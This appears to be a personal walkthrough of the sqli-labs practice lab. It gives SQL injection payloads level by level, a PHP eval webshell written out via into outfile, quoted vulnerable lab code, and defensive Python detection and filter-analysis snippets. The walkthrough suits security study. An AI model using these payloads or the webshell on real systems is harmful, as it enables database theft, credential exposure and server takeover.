
Tutorial references:

https://blog.csdn.net/he_and/article/details/79979616

https://blog.csdn.net/qq_41420747/article/details/81836327#Less-1%20GET%20-%20Error%20based%20-%20Single%20quotes%20-%20String(%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84GET%E5%8D%95%E5%BC%95%E5%8F%B7%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5)

[TOC]

# Page-1 Basic Challenges

## Less-1 GET - Error Based - Single quotes - String (error-based GET single-quote string injection)

Initial assessment


The page asks for an `id`, so append `?id=1` to the URL.

The page responds.

Adding a single quote produces an error, so an injection point exists.


Carrying out the attack

The single quote is interpreted, so by closing the quote around the `id` parameter we can insert our own SQL.

```
?id=1' order by 1 #
```

Error; change `#` to its URL encoding `%23`.

```
?id=1' order by 1 %23
```

Displays correctly; trying higher values, 4 gives an error.


So the SELECT has only three columns.

When a query returns several rows only the first is shown, so use a UNION and make the original query return nothing.

```
?id=-1' union select 1,2,3 %23
```

Columns 2 and 3 are displayed on the page.

Get the current database version, database path, current user and current database

```
?id=-1' union select 1,concat_ws('_',user(),version(),database()),@@basedir %23
```

Information obtained.

Table names

```
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23
```

Payload

```
http://localhost/sqli-labs-master/Less-1/?id=1%27%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(username,0x3a,password)%20from%20users)))--+
```

## Less-2 GET - Error Based - Integer (error-based GET integer injection)

As in Less-1, a single quote causes an error

```
?id=1' order by 1
```

Error, so this is a numeric injection.

Remove the single quote; the rest is the same as Less-1.

## Less-3 GET - Error based - Single quotes with twist string (error-based GET single-quote string injection with a twist)

Source code (screenshot in the original)

Input

```
?id=1' %23
```

No output.

```
?id=1') %23
```

Output is displayed.

## Less-4 GET - Error based - Double Quotes - String (error-based GET double-quote string injection)

```
?id=1'
```

Displays normally with no error

Change the single quote to a double quote

```
?id=1"
```

Error; the page shows

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
```

On closer inspection it is a double quote plus a parenthesis: `where id=("1")`

```
?id=1") %23
```

Normal output

## Less-5 GET - Double Injection - Single Quotes - String (double-query GET single-quote string injection)

Using the previous method we find it is injectable, but the page does not return all the information we want.

A time-based blind approach can be used (the page still returns a little).

Database name length (binary search works)

```
?id=1' and if(length(database())=8,sleep(5),1)--+
```

Clear delay, so the length is 8

Brute-force the database name

```
id=1' and if(left(database(),1)='s',sleep(5),1)--+
```

`left` extracts the leftmost characters

## Less-6 GET - Double Injection - Double Quotes - String (double-query GET double-quote string injection)

```
?id=1"
```

Returns an error message

So it is a double-quote injection

The rest is the same as Less-5

## Less-7 GET - Dump into outfile - String (GET string injection with file export)

Source code (screenshots in the original)

Use file export

Use the path found in an earlier Less

```
Less-2/?id=-1 union select 1,@@basedir,@@datadir --+
```

```
?id=1')) union select 1,2,"<?php @eval($_POST['sql']);?>" into outfile '路径'%23
?id=1')) union select 1,2,'<?php @eval($_POST['sql']);?>' into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\sqli-labs-master\\1.php"--+
```

Note that `\\` must be used

==I did not manage to export the file==

Once exported, connect to it with 菜刀 (China Chopper) or 蚁剑 (AntSword)

## Less-8 GET - Blind - Boolean Based - Single Quotes (boolean-based GET single-quote blind injection)

```
?id='
```

No output

```
id=1
```

Output

```
id=1'
```

No output

```
id=1' and 1=1 %23
```

Output

```
id=1' and 1=2 %23
```

No output

So it is a boolean-based injection

Brute-force method

```
?id=1' and left(database(),1)='s'%23
```

## Less-9 GET - Blind - Time based - Single Quotes (time-based GET single-quote blind injection)

Whatever the input, the page displays the same thing -> time-based blind injection

```
?id=1' and sleep(3) %23
```

Noticeable delay

For the brute-force method see Less-5

## Less-10 GET - Blind - Time based - Double quotes (time-based double-quote blind injection)

Change the single quotes of Less-9 to double quotes

## Less-11 POST - Error Based - Single quotes - String (error-based POST single-quote string injection)

```
username: ' or 1=1 #
password: a
```

Returns:

```
Your Login name:Dumb
Your Password:Dumb
```

Logging in as Dumb succeeds

Using HackBar

```
uname=admin' order by 2# &passwd=admin&submit=Submit
```

Returns

```
Your Login name:admin
Your Password:admin
```

Using a UNION query

Note that uname must be wrong for the content after the UNION to be displayed

```
uname=a' union select 1,database() # &passwd=admin&submit=Submit
```

Returns

```
Your Login name:1
Your Password:security
```

The database name is security

## Less-12 POST - Error Based - Double quotes - String - with twist (error-based POST double-quote string injection with a twist)


The usual input gets no reaction; entering `"`

returns

```
have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '""") and password
```

Look at the source

![img](sqli-labs.assets/20180822112455820.png)

There is also a parenthesis, so construct the closing accordingly

```
uname=1") or 1=1# &passwd=1
```


Login succeeds

## Less-13 POST - Double Injection - Single quotes - String - twist (POST single-quote double-query injection with a twist)



Same input box; enter `'`,

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''') and password=('') LIMIT 0,1' at line 1
```

So the value is closed with `('')`

Input

```
1') or 1=1 #
uname=1') or 1=1# &passwd=1
```

Login succeeds, but no information is echoed

The `or` clause (the `1=1` position) can be used to test whether a guess is correct

## Less-14 POST - Double Injection - Double quotes - String - twist (POST double-quote double-query injection with a twist)

Enter a double quote

Error

```
have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '""" and password
```

Comment characters cannot be used

Balance the double quotes

```
uname: " or 1=1 or "
passwd: 1
```


Login succeeds

```
uname=" or 1=2 or " &passwd=admin&submit=Submit
```


Login fails, so conditions can be built at the `1=2` position

### extractvalue(target XML document, XML path)

A function that queries an XML document

```sql
uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit
```

Returns

```
syntax error: '~security'
```

```sql
uname=admin" and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and " &passwd=admin&submit=Submit
```

Returns

```
syntax error: '~5.5.53~'
```



## Less-15 POST - Blind - Boolean/Time Based - Single quotes (boolean/time-based POST single-quote blind injection)

No output

```
' or 1=1 or '1'='2
```


Login succeeds

```
' or 1=(if(substr(version(),1,1)=5,1,0)) or '1'='2
```




## Less-16 POST - Blind - Boolean/Time Based - Double quotes (boolean/time-based POST double-quote blind injection)

Nothing happens whatever is entered

```
") or 1=1 or "1"=("2
```



```
admin")#
```


Both log in successfully

Time-based injection can be used

## Less-17 POST - Update Query - Error Based - String (error-based POST injection in an UPDATE query)

The page says: password reset

![image-20200814133539931](sqli-labs.assets/image-20200814133539931.png)

> The following is reposted from: https://www.jianshu.com/p/ee6446e7f93c
>
> Looking at the source, the `user name` form field is filtered:
>
> ```php
> // take the variables
> if(isset($_POST['uname']) && isset($_POST['passwd']))
> {
>     //making sure uname is not injectable
>     $uname=check_input($_POST['uname']);
>     $passwd=$_POST['passwd'];
>
>     function check_input($value)
>     {
>         if(!empty($value))
>         {
>             // truncation (see comments)
>             $value = substr($value,0,15);
>         }
>         // Stripslashes if magic quotes enabled
>         if (get_magic_quotes_gpc())
>         {
>             $value = stripslashes($value);
>         }
>         // Quote if not a number
>         if (!ctype_digit($value))
>         {
>             $value = "'" . mysql_real_escape_string($value) . "'";
>         }
>         else
>         {
>             $value = intval($value);
>         }
>         return $value;
>     }
>     // ... the rest of the handler (the SELECT and the UPDATE) follows in the original source
> }
> ```
>
> The function check_input() checks the user input and makes it safe. Inside it, mysql_real_escape_string() prefixes the characters \x00, \n, \r, \, ', " and \x1a with a backslash to escape them and prevent injection; this function also avoids the risk of wide-byte injection.
>
> 3. Of course, that is not all: new password cannot be probed for its injection type as easily as before either, because of the user name constraint; if new password is wrong, every attempt is naturally wrong. Having read other people's solutions, I learned that it is single-quote closed and that the SQL statements are: `@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1"; $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";`, and that there is a user named admin (this username almost always exists). So I went straight to constructing payloads.
>
> 4. First, since meaningful information cannot be echoed, the double-query injection used all along is the first choice. Construct: user name: admin, and new password: `' and (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#`
>
> The remaining payloads need no explanation; as in Less-13, enumerate them one by one.
>
> 5. Here I try a new injection method, error-based injection using extractvalue() and updatexml(); for details see: 学习基于extractvalue()和updatexml()的报错注入 (Learning error-based injection with extractvalue() and updatexml()). The injections below all use user name: admin by default.
>
> 6. First inject with updatexml(). Construct `' and updatexml(1,concat('~',(select version())),1)#` to get the version:
>
> Get the database name: `' and updatexml(1,concat('~',(select database())),1)#`
>
> Get table names: `' and updatexml(1,concat('~',(select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1)),1)#`
>
> Change `limit n,1` to get the other table names.
>
> Get column names: `' and updatexml(1,concat('~',(select concat(column_name,';') from information_schema.columns where table_name='emails' limit 0,1)),1)#`
>
> Likewise, change `limit n,1`.
>
> Get the contents: like this it does not work: `' and updatexml(1,concat('~',(select concat(username,';',password) from information_schema.tables where table_name='security' limit 0,1)),1)#`, the error is as follows:
>
> Like this it does not work either: `' and updatexml(1,concat('~',(select concat(username,';',password) from security.users limit 0,1)),1)#`, the error is as follows:
>
> Like this it works, but password became 0; it reset every user's password to 0 in one go, which may cause trouble later. `' or (select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)#`
>
> 7. Using extractvalue(), which is very similar to updatexml() with much the same usage, and even more direct to read. Construct: `' and extractvalue(1,concat('~',(select version())))#`
>
> The remaining statements are similar to the updatexml() ones.

## Less-18 POST - Header Injection - Uagent field - Error based (error-based POST injection via the User-Agent header)


Source code:

```php
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);
    $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd
    ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
    if($row1)
    {
        echo '<font color= "#FFFF00" font size = 3 >';
        $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
        mysql_query($insert);
        //echo 'Your IP ADDRESS is: ' .$IP;
        echo "</font>";
        //echo "<br>";
        echo '<font color= "#0000ff" font size = 3 >';
        echo 'Your User Agent is: ' .$uagent;
        echo "</font>";
        echo "<br>";
        print_r(mysql_error());
        echo "<br><br>";
        echo '<img src="../images/flag.jpg" />';
        echo "<br>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}
```

Nothing is filtered before the insert statement ``$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";``

Start from uagent; capture the request with Burp Suite


4. Clearly, as long as the content of the User-Agent: field (uagent) keeps its single quotes balanced, and a double-query injection or extractvalue()/updatexml() is used to build the statement, we get what we want (because this is an INSERT statement, the information can only be obtained through error messages).


5. Payloads to query the database name:

Variant one:

```
' and updatexml(1,concat('~',(select database())),1) and '1'='1
```

Variant two:

```
' and extractvalue(1,concat('~',(select database()))) and '1'='1
```

Variant three:

```
' and (select 1 from (select count(*),concat(database(),';',floor(rand()*2)) as x from information_schema.tables group by x)as a) and '1'='1
```

## Less-19 POST - Header Injection - Referer field - Error based (error-based POST injection via the Referer header)

The referer is echoed back

PHP file:

```php
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
{
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,20);
    }

    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }

    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}

$uagent = $_SERVER['HTTP_REFERER'];
$IP = $_SERVER['REMOTE_ADDR'];
echo "<br>";
echo 'Your IP ADDRESS is: ' .$IP;
echo "<br>";
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'Referer:'.$uname."\n");
    fclose($fp);

    $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
    if($row1)
    {
        echo '<font color= "#FFFF00" font size = 3 >';
        $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
        mysql_query($insert);
        //echo 'Your IP ADDRESS is: ' .$IP;
        echo "</font>";
        //echo "<br>";
        echo '<font color= "#0000ff" font size = 3 >';
        echo 'Your Referer is: ' .$uagent;
        echo "</font>";
        echo "<br>";
        print_r(mysql_error());
        echo "<br><br>";
        echo '<img src="../images/flag.jpg" />';
        echo "<br>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}
?>
```

Use Burp Suite to change the referer to

```
Referer:'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
```

Or append `*` to the referer and use sqlmap

## Less-20 POST - Cookie injections - Uagent field - Error based (error-based POST injection via the cookie header)

Enter admin / admin


```php
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
if(!isset($_COOKIE['uname']))
{
    //including the Mysql connect parameters.
    include("../sql-connections/sql-connect.php");

    echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome&nbsp;&nbsp;&nbsp;<font color='#FF0000'> Dhakkan </font><br></div>";
    echo "<div align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
    echo "<div style='padding-top:10px; font-size:15px;'>";

    echo "<!--Form to post the contents -->";
    echo '<form action=" " name="form1" method="post">';

    echo ' <div style="margin-top:15px; height:30px;">Username : &nbsp;&nbsp;&nbsp;';
    echo ' <input type="text" name="uname" value=""/> </div>';

    echo ' <div> Password : &nbsp; &nbsp; &nbsp;';
    echo ' <input type="text" name="passwd" value=""/></div></br>';
    echo ' <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';

    echo '</form>';
    echo '</div>';
    echo '</div>';
    echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
    echo '<font size="3" color="#FFFF00">';
    echo '<center><br><br><br>';
    echo '<img src="../images/Less-20.jpg" />';
    echo '</center>';

    function check_input($value)
    {
        if(!empty($value))
        {
            $value = substr($value,0,20); // truncation (see comments)
        }
        if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled
        {
            $value = stripslashes($value);
        }
        if (!ctype_digit($value)) // Quote if not a number
        {
            $value = "'" . mysql_real_escape_string($value) . "'";
        }
        else
        {
            $value = intval($value);
        }
        return $value;
    }

    echo "<br>";
    echo "<br>";

    if(isset($_POST['uname']) && isset($_POST['passwd']))
    {
        $uname = check_input($_POST['uname']);
        $passwd = check_input($_POST['passwd']);

        $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
        $result1 = mysql_query($sql);
        $row1 = mysql_fetch_array($result1);
        $cookee = $row1['username'];
        if($row1)
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            setcookie('uname', $cookee, time()+3600);
            header ('Location: index.php');
            echo "I LOVE YOU COOKIES";
            echo "</font>";
            echo '<font color= "#0000ff" font size = 3 >';
            //echo 'Your Cookie is: ' .$cookee;
            echo "</font>";
            echo "<br>";
            print_r(mysql_error());
            echo "<br><br>";
            echo '<img src="../images/flag.jpg" />';
            echo "<br>";
        }
        else
        {
            echo '<font color= "#0000ff" font size="3">';
            //echo "Try again looser";
            print_r(mysql_error());
            echo "</br>";
            echo "</br>";
            echo '<img src="../images/slap.jpg" />';
            echo "</font>";
        }
    }

    echo "</font>";
    echo '</font>';
    echo '</div>';

}
else
{
    if(!isset($_POST['submit']))
    {
        $cookee = $_COOKIE['uname'];
        $format = 'D d M Y - H:i:s';
        $timestamp = time() + 3600;
        echo "<center>";
        echo '<br><br><br>';
        echo '<img src="../images/Less-20.jpg" />';
        echo "<br><br><b>";
        echo '<br><font color= "red" font size="4">';
        echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
        echo "</font><br>";
        echo '<font color= "cyan" font size="4">';
        echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
        echo "</font><br>";
        echo '<font color= "#FFFF00" font size = 4 >';
        echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
        echo '<font color= "orange" font size = 5 >';
        echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);

        echo "<br></font>";
        $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
        $result=mysql_query($sql);
        if (!$result)
        {
            die('Issue with your mysql: ' . mysql_error());
        }
        $row = mysql_fetch_array($result);
        if($row)
        {
            echo '<font color= "pink" font size="5">';
            echo 'Your Login name:'. $row['username'];
            echo "<br>";
            echo '<font color= "grey" font size="5">';
            echo 'Your Password:' .$row['password'];
            echo "</font></b>";
            echo "<br>";
            echo 'Your ID:' .$row['id'];
        }
        else
        {
            echo "<center>";
            echo '<br><br><br>';
            echo '<img src="../images/slap1.jpg" />';
            echo "<br><br><b>";
            //echo '<img src="../images/Less-20.jpg" />';
        }
        echo '<center>';
        echo '<form action="" method="post">';
        echo '<input type="submit" name="submit" value="Delete Your Cookie!" />';
        echo '</form>';
        echo '</center>';
    }
    else
    {
        echo '<center>';
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 6 >';
        echo " Your Cookie is deleted";
        setcookie('uname', $row1['username'], time()-3600);
        header ('Location: index.php');
        echo '</font></center></br>';
    }

    echo "<br>";
    echo "<br>";
    //header ('Location: main.php');
    echo "<br>";
    echo "<br>";

    //echo '<img src="../images/slap.jpg" /></center>';
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'Cookie:'.$cookee."\n");

    fclose($fp);
}
?>
```


The query uses `cookee`, so try injecting through the cookie; capture the request


We see `Cookie: uname=admin`, which confirms cookie injection

Append `'` after admin: an error

```
Cookie: uname=admin' order by 3--+   // 1-3 normal
Cookie: uname=admin' order by 4--+   // 4 fails, so there are 3 columns
Cookie: uname=-admin' union select 1,2,database()--+
```


## Less-21

The uname value is base64 encoded; otherwise the same as the previous exercise

Send the encoded payload

```
admin' and 1=1 --+    // plaintext
YWRtaW4nIGFuZCAxPTEgLS0r // encoded
-admin') union select 1,2,database()#
LWFkbWluJykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw==
```

## Less-22

Double quotes; otherwise the same as the previous exercise

```
-admin" union select 1,2,database()#
LWFkbWluIiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
```
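A detection-side counterpart to Less-18 through Less-22, added here as an example (not sqli-labs code or the author's): it scans request-log lines for the error-based functions, tautologies and comment terminators used in the header payloads above, and base64-decodes the `uname` cookie value the way Less-21/22 encode it. The log line format, IP addresses and sample lines are constructed for the demo.

```python
"""Detect error-based SQLi probes carried in HTTP headers.

Added example for this write-up (not sqli-labs or the author's code).
Less-18/19/20 inject through User-Agent, Referer and the uname cookie,
and Less-21/22 base64-encode the cookie value; the log format and the
sample lines below are constructed for the demo.
"""
import base64
import re
from urllib.parse import unquote

# Markers from the write-up's payloads: XML error functions, UNION,
# tautologies used to re-balance quotes, and comment terminators.
SUSPICIOUS = re.compile(
    r"(updatexml|extractvalue)\s*\(|union\s+select|"
    r"\b(and|or)\b\s+1\s*=\s*1|--\+|--\s|#$",
    re.IGNORECASE,
)

# Constructed log lines, one header per request: "<ip> <header>: <value>"
LOG_LINES = [
    "10.0.0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64)",
    "10.0.0.7 User-Agent: ' and updatexml(1,concat('~',(select database())),1) and '1'='1",
    "10.0.0.8 Referer: http://localhost/sqli-labs/Less-19/",
    "10.0.0.9 Referer: 'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '",
    "10.0.0.3 Cookie: uname=admin",
    "10.0.0.4 Cookie: uname=YWRtaW4nIGFuZCAxPTEgLS0r",
    "10.0.0.6 Cookie: uname=LWFkbWluIiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj",
]


def try_base64(value: str) -> str:
    """Return the base64 plaintext of value if it decodes to printable
    text (Less-21/22 style), otherwise the value unchanged."""
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return value
    return decoded if decoded.isprintable() else value


def inspect_line(line: str):
    """Return (ip, header, decoded_value) when the header value looks like
    an injection probe, or None for a benign line."""
    m = re.match(r"(\S+) (User-Agent|Referer|Cookie): (.*)", line)
    if not m:
        return None
    ip, header, value = m.groups()
    value = unquote(value)  # payloads often arrive URL-encoded (%27, %23)
    if header == "Cookie":
        cm = re.search(r"uname=([^;]+)", value)
        if cm:
            value = try_base64(cm.group(1))
    return (ip, header, value) if SUSPICIOUS.search(value) else None


def scan(lines):
    """All suspicious (ip, header, decoded_value) tuples, in log order."""
    return [hit for hit in map(inspect_line, lines) if hit]
```

Running `scan(LOG_LINES)` flags four of the seven constructed lines and returns the decoded cookie payloads in plaintext, which is what an alert should carry.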

## Less-23 GET - Error based - strip comments (error-based GET injection with comments stripped)


No input box, so consider a GET injection

```
id='
```

Error

```
?id=' union select 1,2,database() '
?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() or '1'= '
?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' or '1'= '
?id=' union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '
```

## Less-24 Second Degree Injections Real treat - Store Injections (second-order injection)

Register the user `admin'#`

After logging in, change the password; the statement becomes

users SET passwd

Then log in to the admin account with the changed password



## Less-25 Trick with OR & AND (or and and are filtered)

![image-20200829115431073](sqli-labs.assets/image-20200829115431073.png)

`or` and `and` are filtered

Input

```
?id=1
```


Error

![image-20200829115610277](sqli-labs.assets/image-20200829115610277.png)

```
?id=1'%23
```

Works, so it is injectable

Use a UNION query

```
?id=-1' union select 1,2,database()--+
```


Note: because `or` is filtered, write `password` as `passwoorrd`

```
?id=-1' union select 1,2,group_concat(username,0x7e,passwoorrd) from users--+
```


Double-write `or` and `and`

```
?id=0' oorr 1=1 --+
?id=2' aandnd 1=1 --+
```

Works

## Less-26 (failed) Trick with comments and space (injection with comments and spaces filtered)

Reference: https://www.jianshu.com/p/ff72f2c6d99c

Source code

```php
$id = blacklist($id);
$hint = $id;
function blacklist($id)
{
    $id = preg_replace('/or/i',"",$id);        //strip out OR (non case sensitive)
    $id = preg_replace('/and/i',"",$id);       //Strip out AND (non case sensitive)
    $id = preg_replace('/[\/\*]/',"",$id);     //strip out /*
    $id = preg_replace('/[--]/',"",$id);       //Strip out --
    $id = preg_replace('/[#]/',"",$id);        //Strip out #
    $id = preg_replace('/[\s]/',"",$id);       //Strip out spaces
    $id = preg_replace('/[\/\\\\]/',"",$id);   //Strip out slashes
    return $id;
}
```

Besides the `or` and `and` of the previous level, this also filters the single-line comments `--` and `#` (including their URL-encoded forms), the multi-line comment `/**/` (which is interpreted as a space and is commonly used when spaces are filtered), spaces themselves, and both slashes `/` and `\`.
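The `blacklist()` above, ported to Python as an added example (not sqli-labs code or the author's) to check two properties a defender cares about: whether the filter is idempotent, and whether the page's working Less-26 payload is touched by it at all; an allowlist check for the numeric `id` parameter is shown as the alternative. The sample inputs are constructed from the payloads in this write-up.

```python
"""Why the Less-26 blacklist() is not a control.

Added example for this write-up (not sqli-labs or the author's code): the
PHP blacklist() above is ported to Python so two properties can be checked,
idempotence and whether the page's working payload survives it. The
allowlist check stands in for how a numeric id should be validated instead.
Sample inputs are constructed from the payloads in the write-up.
"""
import re
from typing import Optional


def blacklist(value: str) -> str:
    """Faithful port of the page's blacklist(): one pass of stripping,
    in the same order as the PHP preg_replace calls."""
    value = re.sub(r"or", "", value, flags=re.IGNORECASE)   # strip OR
    value = re.sub(r"and", "", value, flags=re.IGNORECASE)  # strip AND
    value = re.sub(r"[/*]", "", value)                      # strip / and *
    value = re.sub(r"[-]", "", value)                       # strip -
    value = re.sub(r"[#]", "", value)                       # strip #
    value = re.sub(r"\s", "", value)                        # strip whitespace
    value = re.sub(r"[/\\]", "", value)                     # strip slashes
    return value


def is_idempotent(sanitize, value: str) -> bool:
    """A sanitizer that removes substrings must reach a fixed point;
    if sanitize(sanitize(x)) != sanitize(x), the first pass left pieces
    that reassemble into a keyword, which is the Less-25 double-write."""
    once = sanitize(value)
    return sanitize(once) == once


def validate_id(raw: str) -> Optional[int]:
    """Allowlist check for the id parameter: accept only an unsigned
    decimal integer and return it, otherwise None (reject, do not clean)."""
    if re.fullmatch(r"[0-9]{1,10}", raw) is None:
        return None
    return int(raw)


# Inputs taken from the write-up plus one benign value.
DOUBLED = "0' oorr 1=1 --+"                                            # Less-25
XML_PAYLOAD = "0'||updatexml(1,concat('$',(database())),0)||'1'='1"   # Less-26
BENIGN = "information_schema.tables"


if __name__ == "__main__":
    for sample in (DOUBLED, XML_PAYLOAD, BENIGN):
        print(f"{sample!r:60} -> {blacklist(sample)!r} "
              f"idempotent={is_idempotent(blacklist, sample)} "
              f"allowlist={validate_id(sample)}")
```

The port shows the three failure modes side by side: the doubled keyword survives one pass, the `||`/`updatexml` payload passes untouched, and a benign `information_schema.tables` is mangled, while the allowlist rejects both payloads and accepts plain integers.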

Tried to bypass with %a0; it did not work

updatexml injection

```
?id=0'||updatexml(1,concat('$',(database())),0)||'1'='1
```


```
?id=0'||updatexml(1,concat('$',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),0)||'1'='1
```


## Less-27 GET - Error Based - All your UNION & SELECT belong to us (union and select are filtered)


Uppercase keywords are not filtered

Replace `or` with `&&` (%26%26)

The write-up uses %a0 to bypass the space filter; it did not work for me

## Less-27a GET - Blind Based - All your UNION & SELECT belong to us

Double-quote type

```
?id=1"and(length(database())>7)%a0uNion%a0sELect%a01,2,"3
```

Again, the %a0 bypass did not work

Author: Michelle19l
Link: https://gitee.com/michelle19l/michelle19l/2020/08/29/sqli/sqli-labs/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.